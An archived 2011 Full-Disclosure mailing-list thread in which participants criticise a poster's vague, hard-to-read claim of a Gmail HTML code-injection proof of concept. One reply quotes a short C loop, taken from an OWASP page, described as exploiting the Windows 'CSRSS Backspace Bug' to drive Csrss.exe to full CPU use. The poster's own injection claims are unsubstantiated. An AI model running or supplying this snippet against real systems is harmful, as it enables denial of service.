| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BANLkTi=2Tf6iMfBqcDniQZadpE3xK_33jQ@mail.gmail.com>
Date: Sat, 11 Jun 2011 21:11:32 -0500
From: adam <adam@...sy.net>
To: phocean <0x90@...cean.net>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: POC for a simple gmail/possible code
injection into html wich can be executed in an email,
i will make the PoC code and explain how here and now...
Furthermore, pretending that we [the readers] are somehow at fault here (for
not understanding) isn't going to get you very far. The only thing
consistent in this entire thread is that people *kind of* want to know what
you're talking about, but aren't able to due to the poor writing style and
spelling/grammar errors.
It should be noted that no one is being anal about typos, I fully understand
that people make mistakes. The difference is that it appears you didn't even
so much as proof read the original email.
On Sat, Jun 11, 2011 at 9:04 PM, phocean <0x90@...cean.net> wrote:
> Hi n3td3v... oops!... secn3t (that is close),
>
> Sorry but I don't understand anything to this thread.
> Each of your emails is such a pain to read, that I stop at the first
> sentence.
> We are all busy and don't want to take 20 min to decipher your writing
> with the risk that it is not deserving it.
> Please clarify and give consistent technical facts.
>
> Thanks.
>
> Le 12/06/2011 03:33, -= Glowing Doom =- a écrit :
> > This is NOT coded.. the PoC i am explaining, is possible with simply
> > copyying text,then using a sequence of keys, to make the actual
> > sentence/s, appear.
> > This code is not what shows up when it is dissected.
> > It shows up with many x41 all over the email when it is done properly .
> > Regards.
> >
> >
> >
> > On 12 June 2011 11:29, Christian Sciberras <uuf6429@...il.com
> > <mailto:uuf6429@...il.com>> wrote:
> >
> > For those lazy enough to search:
> >
> >
> https://www.owasp.org/index.php/The_CSRSS_Backspace_Bug_still_works_in_windows_2003_sp1
> >
> >
> > Excerpt:
> >
> > Basicaly just compile this and you will get a 100% processor usage
> > by the compiled exploit and Csrss.exe
> >
> > #include <stdio.h>
> > int main(void)
> > {
> > while(1)
> > printf("\t\t\b\b\b\b\b\b");
> > return 0;
> > }
> >
> >
> > How this helps in sending spam is beyond me.
> >
> >
> >
> > On Sun, Jun 12, 2011 at 3:18 AM, Jeffrey Walton <noloader@...il.com
> > <mailto:noloader@...il.com>> wrote:
> >
> > On Sat, Jun 11, 2011 at 9:06 PM, -= Glowing Doom =-
> > <secn3t@...il.com <mailto:secn3t@...il.com>> wrote:
> >
> > > It is now, over 1yr old atleast and exists in riched20.dll.
> > > This PoC info is over for me also.
> > Microsoft had problems with a backspace in the past. Search for
> > "CSRSS
> > Backspace Bug".
> >
> > > [SNIP
> >
> > Jeff
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
> --
> phocean
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists